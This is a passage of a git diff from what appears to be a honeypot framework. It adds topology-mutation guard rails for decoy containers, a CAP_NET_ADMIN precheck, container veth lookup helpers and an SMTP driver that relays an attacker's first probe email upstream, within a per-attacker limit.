await _materialise_decky_remove(
|
||||||
|
repo, topology_id, decky_name, services_list,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -354,31 +877,136 @@ async def apply_update_decky(
|
|||||||
``patch`` — dict merged into existing ``decky_config``.
|
``patch`` — dict merged into existing ``decky_config``.
|
||||||
``services`` — replacement top-level services list.
|
``services`` — replacement top-level services list.
|
||||||
``x``,``y`` — layout coords.
|
``x``,``y`` — layout coords.
|
||||||
|
``force`` — opt-in for destructive recreates (currently
|
||||||
|
required when ``forwards_l3`` flips on a
|
||||||
|
live topology — see below).
|
||||||
|
|
||||||
|
Live materialisation strategy:
|
||||||
|
|
||||||
|
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||||
|
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||||
|
direct API path (services_live) without coupling.
|
||||||
|
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||||
|
can only apply at container-create time. Requires recreating
|
||||||
|
the base — destructive (kills in-container state, drops active
|
||||||
|
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||||
|
raise ``MutationError`` so a half-thinking operator doesn't
|
||||||
|
stomp a live decky.
|
||||||
|
* **only coords (x/y)** → DB-only. No docker work.
|
||||||
"""
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
|
|
||||||
|
# Capture pre-state so we can compute the diff after the DB write.
|
||||||
|
old_services = list(decky.get("services") or [])
|
||||||
|
old_cfg = decky.get("decky_config") or {}
|
||||||
|
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||||
|
|
||||||
patch: dict[str, Any] = {}
|
patch: dict[str, Any] = {}
|
||||||
|
new_decky_config = old_cfg
|
||||||
if payload.get("patch"):
|
if payload.get("patch"):
|
||||||
merged = dict(decky["decky_config"])
|
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||||
merged.update(payload["patch"])
|
patch["decky_config"] = new_decky_config
|
||||||
patch["decky_config"] = merged
|
new_services = old_services
|
||||||
if "services" in payload:
|
if "services" in payload:
|
||||||
patch["services"] = list(payload["services"])
|
new_services = list(payload["services"])
|
||||||
|
patch["services"] = new_services
|
||||||
for key in ("x", "y"):
|
for key in ("x", "y"):
|
||||||
if key in payload:
|
if key in payload:
|
||||||
patch[key] = payload[key]
|
patch[key] = payload[key]
|
||||||
if not patch:
|
if not patch:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||||
|
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||||
|
|
||||||
|
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||||
|
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||||
|
# the DMZ' — running it on an internal LAN publishes ports the
|
||||||
|
# outside world can't reach and shadows the host's port space.
|
||||||
|
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||||
|
# the generator/attach paths, not by this op, so this check only
|
||||||
|
# fires when the operator explicitly toggles the flag.
|
||||||
|
if forwards_l3_flipped and new_forwards_l3:
|
||||||
|
# Re-derive the home LAN from the edges; same logic as
|
||||||
|
# check_gateway_homed_in_dmz.
|
||||||
|
decky_uuid = decky["uuid"]
|
||||||
|
home_lan_id: Optional[str] = None
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
if home_lan_id is None:
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
home_lan = next(
|
||||||
|
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||||
|
None,
|
||||||
|
)
|
||||||
|
if home_lan is None or not home_lan.get("is_dmz"):
|
||||||
|
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||||
|
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||||
|
"Move the decky to the DMZ first, or pick a different decky."
|
||||||
|
)
|
||||||
|
|
||||||
|
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||||
|
# mutation leaves zero side-effects.
|
||||||
|
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||||
|
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||||
|
raise MutationError(
|
||||||
|
f"forwards_l3 flip on live decky "
|
||||||
|
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||||
|
"this will recreate the base container and drop in-container state"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_topology_decky(decky["uuid"], patch)
|
await repo.update_topology_decky(decky["uuid"], patch)
|
||||||
|
|
||||||
|
# Materialisation — only when the topology is actually live.
|
||||||
|
# _live_topology_or_none was already called above; calling the
|
||||||
|
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||||
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
added = sorted(set(new_services) - set(old_services))
|
||||||
|
removed = sorted(set(old_services) - set(new_services))
|
||||||
|
if added or removed:
|
||||||
|
await _materialise_decky_services_diff(
|
||||||
|
repo, topology_id, decky_name, added, removed,
|
||||||
|
)
|
||||||
|
if forwards_l3_flipped:
|
||||||
|
# force was checked above; reaching here means the operator
|
||||||
|
# opted in. recreate_base re-renders compose first so the
|
||||||
|
# rebuilt base picks up the new `ports:` block.
|
||||||
|
await _materialise_decky_recreate_base(
|
||||||
|
repo, topology_id, decky_name,
|
||||||
|
)
|
||||||
|
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
async def apply_update_lan(
|
async def apply_update_lan(
|
||||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||||
|
|
||||||
|
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||||
|
Live deckies bind to the bridge with IPs allocated from the old
|
||||||
|
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||||
|
flag, which docker can't change on a network with active
|
||||||
|
containers). Reject those mutations on active/degraded topologies
|
||||||
|
rather than rewriting the DB into an incoherent state.
|
||||||
|
|
||||||
|
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||||
|
unconditionally. Renames pass through too — the bridge's docker
|
||||||
|
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||||
|
rename would also need a rebuild — but rename isn't currently a
|
||||||
|
code path on active topologies; if the operator hits it we still
|
||||||
|
write the row and let the next deploy reconcile.
|
||||||
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
lan = _lan_by_name(hydrated, payload["name"])
|
lan = _lan_by_name(hydrated, payload["name"])
|
||||||
if lan is None:
|
if lan is None:
|
||||||
@@ -389,6 +1017,17 @@ async def apply_update_lan(
|
|||||||
fields[key] = payload[key]
|
fields[key] = payload[key]
|
||||||
if not fields:
|
if not fields:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||||
|
if is_live:
|
||||||
|
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||||
|
if hostile:
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||||
|
f"teardown + redeploy required"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_lan(lan["id"], fields)
|
await repo.update_lan(lan["id"], fields)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|||||||
@@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
|||||||
# Host-side macvlan interface (hairpin fix)
|
# Host-side macvlan interface (hairpin fix)
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
def _require_root() -> None:
|
# Linux capability bit positions — see capabilities(7).
|
||||||
if os.geteuid() != 0:
|
_CAP_NET_ADMIN = 12
|
||||||
raise PermissionError(
|
|
||||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
|
||||||
)
|
def _has_cap_net_admin() -> bool:
    """Return True if this process holds CAP_NET_ADMIN in its effective set.

    Reads ``/proc/self/status`` rather than calling ``capget(2)`` so no
    libcap dependency is needed. ``CapEff`` is a hex bitmask; bit
    ``_CAP_NET_ADMIN`` is CAP_NET_ADMIN.

    Returns:
        False when the status file cannot be read, carries no ``CapEff:``
        line, or that line cannot be parsed — this is a precheck, so any
        doubt is reported as "capability not held" instead of crashing.
    """
    try:
        # errors="replace": the "Name:" line precedes CapEff and may hold
        # bytes that are not valid in the locale encoding; strict decoding
        # would raise before the CapEff line is ever reached.
        with open(
            "/proc/self/status", "r", encoding="utf-8", errors="replace"
        ) as fh:
            for line in fh:
                if line.startswith("CapEff:"):
                    bits = int(line.split()[1], 16)
                    return bool(bits & (1 << _CAP_NET_ADMIN))
    except (OSError, ValueError, IndexError):
        # Unreadable file or malformed CapEff line: fall through to False.
        pass
    return False
|
||||||
|
|
||||||
|
|
||||||
|
def _require_net_admin() -> None:
    """Fail fast when the process cannot run ``ip link add ... macvlan``.

    The kernel checks CAP_NET_ADMIN for the netlink RTM_NEWLINK of a
    macvlan/ipvlan slave. euid 0 is sufficient (it grants every cap) but
    not necessary, so the capability is accepted as well; that lets the
    systemd unit's ``AmbientCapabilities=CAP_NET_ADMIN`` be honoured
    without forcing the whole API to run as root.

    Raises:
        PermissionError: the process is neither root nor holds
            CAP_NET_ADMIN.
    """
    # Root short-circuits the /proc lookup.
    privileged = os.geteuid() == 0 or _has_cap_net_admin()
    if not privileged:
        raise PermissionError(
            "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
            "Either run as root or grant the cap (systemd: "
            "AmbientCapabilities=CAP_NET_ADMIN)."
        )
|
||||||
|
|
||||||
|
|
||||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||||
@@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
host-helper first: the two drivers can share a parent NIC on paper but
|
host-helper first: the two drivers can share a parent NIC on paper but
|
||||||
leaving the opposite helper in place is just cruft after a driver swap.
|
leaving the opposite helper in place is just cruft after a driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||||
dangling on the parent NIC after the driver swap.
|
dangling on the parent NIC after the driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str:
|
|||||||
strict=False,
|
strict=False,
|
||||||
)
|
)
|
||||||
return str(network)
|
return str(network)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Container veth resolution (for tc netem tarpit)
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process.

    Args:
        container_name: Docker container name to look up.

    Returns:
        The ``State.Pid`` value Docker reports for the container.

    Raises:
        LookupError: the container does not exist, or it exists but is
            not running (Docker reports PID 0).
    """
    client = docker.from_env()
    try:
        try:
            container = client.containers.get(container_name)
        except docker.errors.NotFound as exc:
            # Chain the cause so the Docker error stays in the traceback.
            raise LookupError(f"container {container_name!r} not found") from exc
        pid = container.attrs["State"]["Pid"]
    finally:
        # A client is created on every call; release it on every exit path.
        client.close()
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
|
||||||
|
|
||||||
|
|
||||||
|
def get_container_veth(container_name: str) -> str:
    """Return the host interface name paired to *container_name*'s eth0.

    Runs ``cat /sys/class/net/eth0/iflink`` inside the container via
    ``docker exec`` to obtain the peer interface index, then looks that
    index up in the host's ``ip link show`` output. No nsenter is used.

    NOTE(review): for macvlan/ipvlan-attached containers ``iflink``
    presumably refers to the parent NIC rather than a veth — confirm
    callers only pass bridge-attached containers.

    Raises:
        LookupError: the ``docker exec`` fails, or no host link carries
            the reported peer index.
    """
    probe = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if probe.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {probe.stderr.strip()}"
        )

    peer_index = probe.stdout.strip()
    wanted_prefix = f"{peer_index}:"
    host_links = _run(["ip", "link", "show"]).stdout
    for entry in host_links.splitlines():
        if not entry.startswith(wanted_prefix):
            continue
        # Format: "42: veth3a4b5c@if41: <BROADCAST,...>" -> "veth3a4b5c"
        name_field = entry.split(":")[1]
        return name_field.strip().split("@")[0]

    raise LookupError(
        f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
    )
|
||||||
|
|||||||
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
"""SMTP probe-relay driver.
|
||||||
|
|
||||||
|
Forwards the attacker's first probe email via the master's real internet
|
||||||
|
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||||
|
the master (where this worker runs) does.
|
||||||
|
|
||||||
|
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import email
|
||||||
|
import smtplib
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||||
|
|
||||||
|
|
||||||
|
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
|
||||||
|
"""Return body with a From: header added if one is absent."""
|
||||||
|
try:
|
||||||
|
msg = email.message_from_bytes(body)
|
||||||
|
except Exception:
|
||||||
|
return body
|
||||||
|
if msg["From"]:
|
||||||
|
return body
|
||||||
|
# Prepend the header before the existing content.
|
||||||
|
header_line = f"From: {mail_from}\r\n".encode()
|
||||||
|
return header_line + body
|
||||||
|
|
||||||
|
|
||||||
|
def forward_probe(
    *,
    svc_cfg: dict[str, Any],
    stored_as: str,
    decky_name: str,
    mail_from: str,
    rcpt_to: list[str],
    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
    """Read the stored .eml from disk and forward it via the upstream relay.

    Args:
        svc_cfg: ``smtp_relay`` service config. Keys read here:
            ``upstream_host`` (required), ``upstream_port`` (default 25),
            ``upstream_user`` / ``upstream_pass`` (login only when both
            are set) and ``upstream_sender`` (envelope-from override).
        stored_as: Path of the .eml relative to
            ``<artifacts_root>/<decky_name>/smtp``.
        decky_name: Decky whose artifact directory holds the message.
        mail_from: Sender given by the probing client; used for the
            ``From:`` header and, absent ``upstream_sender``, the envelope.
        rcpt_to: Envelope recipients.
        artifacts_root: Root directory of captured artifacts.

    Returns:
        ``(True, "")`` on success or ``(False, reason)`` on failure.
        Uses only blocking I/O, so it is safe to call in a worker thread.
    """
    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
    if not upstream_host:
        return False, "upstream_host not configured"

    # decky_name / stored_as arrive via the bus payload; refuse anything
    # that could step outside the artifacts tree (absolute path or "..").
    for component in (decky_name, stored_as):
        relative = Path(component)
        if relative.is_absolute() or ".." in relative.parts:
            return False, "invalid artifact path"

    eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
    try:
        body = eml_path.read_bytes()
    except OSError as exc:
        return False, f"cannot read eml: {exc}"

    if not rcpt_to:
        return False, "no recipients"

    try:
        upstream_port = int(svc_cfg.get("upstream_port") or 25)
    except (TypeError, ValueError):
        # Keep the (False, reason) contract for a malformed config value.
        return False, "invalid upstream_port"
    upstream_user = (svc_cfg.get("upstream_user") or "").strip()
    upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
    envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from

    # Ensure the message has a From: header so mail clients show the attacker's
    # address rather than falling back to the envelope sender (upstream_sender).
    # Minimal relay-test scripts often omit headers entirely.
    body = _ensure_from_header(body, mail_from)

    try:
        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
            conn.ehlo()
            if conn.has_extn("STARTTLS"):
                # NOTE(review): starttls() without an SSLContext presumably
                # does not verify the upstream certificate — confirm that
                # opportunistic TLS is intended here.
                conn.starttls()
                conn.ehlo()
            if upstream_user and upstream_pass:
                conn.login(upstream_user, upstream_pass)
            conn.sendmail(envelope_from, rcpt_to, body)
        return True, ""
    except Exception as exc:
        # Boundary: any SMTP/network failure is reported as a reason,
        # truncated to 256 characters.
        return False, str(exc)[:256]
|
||||||
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
import shlex
|
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
from datetime import datetime
|
||||||
import base64
|
|
||||||
from datetime import datetime, timezone
|
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||||
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
|
|||||||
) -> ActivityResult:
|
) -> ActivityResult:
|
||||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||||
|
|
||||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||||
it doesn't all stamp at wall-clock-now (the realism failure
|
backdate the file (otherwise everything stamps at wall-clock-now
|
||||||
this migration is fixing).
|
— the realism failure this path was originally fixing).
|
||||||
"""
|
"""
|
||||||
|
from decnet.decky_io import write_file_to_container
|
||||||
|
|
||||||
container = _container_for(decky_name)
|
container = _container_for(decky_name)
|
||||||
b64 = base64.b64encode(content).decode("ascii")
|
success, error = await write_file_to_container(
|
||||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||||
# container's local TZ doesn't drift the mtime.
|
|
||||||
if mtime is not None:
|
|
||||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
|
||||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
|
||||||
else:
|
|
||||||
touch_cmd = f"touch {shlex.quote(path)}"
|
|
||||||
sh_cmd = (
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
|
||||||
f"base64 -d > {shlex.quote(path)} && "
|
|
||||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
|
||||||
f"{touch_cmd}"
|
|
||||||
)
|
)
|
||||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
|
||||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
|
||||||
success = rc == 0
|
|
||||||
payload: dict[str, Any] = {
|
payload: dict[str, Any] = {
|
||||||
"dst_decky": decky_name,
|
"dst_decky": decky_name,
|
||||||
"path": path,
|
"path": path,
|
||||||
"bytes": len(content),
|
"bytes": len(content),
|
||||||
"rc": rc,
|
"rc": 0 if success else 1,
|
||||||
"stderr": stderr.strip()[:256] if not success else None,
|
"stderr": error if not success else None,
|
||||||
}
|
}
|
||||||
return ActivityResult(success=success, payload=payload)
|
return ActivityResult(success=success, payload=payload)
|
||||||
|
|
||||||
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
|
||||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
|
||||||
host to share the destination container's separator semantics, but
|
|
||||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
|
||||||
idx = path.rfind("/")
|
|
||||||
if idx <= 0:
|
|
||||||
return "/"
|
|
||||||
return path[:idx]
|
|
||||||
|
|||||||
@@ -175,7 +175,7 @@ async def pick(
|
|||||||
)
|
)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||||
if len(active) < 2:
|
if len(active) < 2:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||||
|
|||||||
@@ -25,6 +25,7 @@ import secrets
|
|||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
publish_safely,
|
publish_safely,
|
||||||
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
|
|||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator import events, scheduler
|
from decnet.orchestrator import events, scheduler
|
||||||
from decnet.orchestrator.drivers import get_driver_for
|
from decnet.orchestrator.drivers import get_driver_for
|
||||||
|
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||||
from decnet.orchestrator.emailgen import (
|
from decnet.orchestrator.emailgen import (
|
||||||
events as email_events,
|
events as email_events,
|
||||||
scheduler as email_scheduler,
|
scheduler as email_scheduler,
|
||||||
@@ -138,6 +140,9 @@ async def orchestrator_worker(
|
|||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
run_control_listener(bus, "orchestrator", shutdown),
|
run_control_listener(bus, "orchestrator", shutdown),
|
||||||
)
|
)
|
||||||
|
probe_task = asyncio.create_task(
|
||||||
|
_run_smtp_probe_listener(repo, shutdown),
|
||||||
|
)
|
||||||
tick_n = 0
|
tick_n = 0
|
||||||
try:
|
try:
|
||||||
while not shutdown.is_set():
|
while not shutdown.is_set():
|
||||||
@@ -157,7 +162,7 @@ async def orchestrator_worker(
|
|||||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
finally:
|
finally:
|
||||||
for t in (heartbeat_task, control_task):
|
for t in (heartbeat_task, control_task, probe_task):
|
||||||
t.cancel()
|
t.cancel()
|
||||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||||
await t
|
await t
|
||||||
@@ -467,6 +472,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
|||||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||||
|
|
||||||
|
|
||||||
|
async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to smtp.probe.pending and forward probe emails upstream.

    Runs as a long-lived subtask alongside the tick loop. Each event's
    payload is handed to :func:`_handle_probe_pending`; a failure on one
    event is logged and the loop carries on.

    *shutdown* is only examined when an event arrives, so the owning
    worker is expected to cancel this task to stop it while idle.
    Cancellation is re-raised; any other bus error is logged and ends the
    listener.
    """
    # Bound before the try so ``finally`` never touches an unbound name
    # when get_bus() itself raises.
    bus = None
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        if bus is not None:
            # Best-effort close; a failing close must not mask the exit path.
            with contextlib.suppress(Exception):
                await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
    """Forward one pending SMTP probe and record the outcome as a bounty.

    Reads ``decky``, ``attacker_ip``, ``stored_as``, ``mail_from`` and
    ``rcpt_to`` from *payload*. Returns without doing anything when a
    required field is missing, the decky is unknown, no ``upstream_host``
    is configured for its ``smtp_relay`` service, or
    ``repo.count_probe_relays`` already meets ``probe_limit`` (default 1).

    Otherwise the blocking :func:`forward_probe` runs in the default
    executor and a ``probe_relay`` bounty is stored with the result; a
    failure reason is kept under ``fwd_error``.
    """
    decky_name = (payload.get("decky") or "").strip()
    attacker_ip = (payload.get("attacker_ip") or "").strip()
    stored_as = (payload.get("stored_as") or "").strip()
    mail_from = (payload.get("mail_from") or "").strip()

    # rcpt_to is normally a comma-separated string; a list of addresses is
    # accepted as well instead of crashing on ``.strip()``.
    rcpt_to_raw = payload.get("rcpt_to") or ""
    if isinstance(rcpt_to_raw, str):
        rcpt_to_raw = rcpt_to_raw.split(",")

    if not (decky_name and attacker_ip and stored_as):
        return

    decky_row = await repo.get_fleet_decky_by_name(decky_name)
    if not decky_row:
        return
    # ``or {}`` at every level: a key present with a None value must not
    # break the chain.
    decky_config = decky_row.get("decky_config") or {}
    service_config = decky_config.get("service_config") or {}
    svc_cfg = service_config.get("smtp_relay") or {}
    if not (svc_cfg.get("upstream_host") or "").strip():
        return

    probe_limit = int(svc_cfg.get("probe_limit") or 1)
    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
    if already_sent >= probe_limit:
        return

    rcpt_to = [
        r.strip() for r in rcpt_to_raw if isinstance(r, str) and r.strip()
    ]
    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")

    # get_running_loop() is the supported call inside a coroutine.
    loop = asyncio.get_running_loop()
    ok, reason = await loop.run_in_executor(
        None,
        lambda: forward_probe(
            svc_cfg=svc_cfg,
            stored_as=stored_as,
            decky_name=decky_name,
            mail_from=mail_from,
            rcpt_to=rcpt_to,
            artifacts_root=artifacts_root,
        ),
    )

    await repo.add_bounty({
        "decky": decky_name,
        "service": "smtp_relay",
